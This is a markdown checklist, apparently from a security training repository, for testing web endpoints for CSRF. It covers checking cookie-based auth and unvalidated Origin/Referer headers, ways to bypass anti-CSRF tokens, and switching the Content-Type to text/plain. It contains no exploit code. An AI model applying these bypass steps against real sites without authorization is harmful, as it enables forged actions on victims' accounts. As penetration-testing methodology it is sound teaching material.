Skip to content

Latest commit

 

History

History
43 lines (28 loc) · 1.44 KB

csrf-testing-methodology.md

File metadata and controls

43 lines (28 loc) · 1.44 KB

Total 4 number of tests can be done on csrf

  1. Simple CSRF
  2. Anti CSRF token bypass
  3. CSRF Content-Type:text/plain
  4. CSRF FLASH

1. Simple CSRF Testing Methodology

  1. Check if the given api endpoint is cookie based endpoint.
       It must be cookie based.

  2. Check if
    origin and referrer
    header are not validated by server by deleting and resending the request.

Origin: http://fl4tswa8w0y12jpm-apillab1.labs.peritustrainingschool.com
Referer: http://fl4tswa8w0y12jpm-apillab1.labs.peritustrainingschool.com/Csrf1

   They must not be validated by server.

  1. If server is not validating... 😃

  2. Exploit it.

Note: you can generate poc from burp.

2. Testing when Anti CSRF Tockens are enabled.

Note: Please check all tests by changing request methods also.

  1. First, check by passing blank parameter value. Check if server accepts. (Use burp and remove token value)

Token : Blank_Value

  1. Second, Remove parameter and anti-CSRF token completely.

  2. Add similar length token. (Change few values in token).

  3. Add another user’s valid anti-CSRF token.

3. CSRF Content-Type:text/plain

  1. Check if no anti-csrf tokens are used. If anti-csrf token is present try anti-csrf token bypass test.
  2. Set content-type=text/plain and verify if the server is processing the request.
  3. Exploitable.